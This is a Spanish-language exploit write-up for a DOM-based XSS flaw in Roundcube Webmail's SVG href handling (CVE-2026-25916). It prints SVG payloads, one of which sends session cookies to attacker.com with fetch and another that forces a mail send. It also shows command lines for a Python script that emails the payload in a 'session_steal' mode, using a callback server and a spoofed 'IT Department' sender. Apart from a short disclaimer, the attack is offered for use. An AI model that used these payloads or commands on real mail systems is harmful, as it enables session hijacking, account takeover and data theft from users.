
Exploit en Python para XSS basado en DOM en Roundcube Webmail (CVE-2026-25916) mediante atributos href en SVG, que permite el secuestro de sesión y la exfiltración de datos a través de correos electrónicos manipulados.
Título del Exploit: XSS DOM en Roundcube Webmail mediante href SVG (CVE-2026-25916)
Autor: Mohammed Idrees Banyamer
Contacto: GitHub @mbanyamer | Instagram @banyamer_security
País: Jordania
Fecha: 9 de febrero de 2026
CVE: CVE-2026-25916
Tipo: Cross-Site Scripting (XSS) basado en DOM
Plataforma: Aplicación web
Probado en: Roundcube 1.6.8, Ubuntu 22.04
Puntuación CVSS: 6.1 (Media)
⚠️ ADVERTENCIA: Este exploit es únicamente para fines educativos y de pruebas autorizadas.
Úselo solo en sistemas que le pertenezcan o para los que tenga permiso explícito por escrito.
El autor no se hace responsable de ningún uso indebido o actividad ilegal.
Las versiones de Roundcube Webmail anteriores a la 1.6.9 contienen una vulnerabilidad XSS basada en DOM en el manejo de SVG. La aplicación no sanea correctamente los atributos y en elementos SVG, lo que permite la ejecución de JavaScript mediante correos electrónicos especialmente diseñados.
hrefxlink:hrefVersiones afectadas: Roundcube Webmail < 1.6.9
Corregido en: Versión 1.6.9 (Commit 26d7677)
CWE: CWE-79 - Neutralización incorrecta de la entrada durante la generación de páginas web
Vector de ataque: Remoto mediante correo electrónico
Impacto: Secuestro de sesión, toma de control de la cuenta, exfiltración de datos
La vulnerabilidad existe en rcube_washtml.php, donde los atributos href en elementos SVG no se validaban correctamente:
<!-- Elementos SVG vulnerables -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"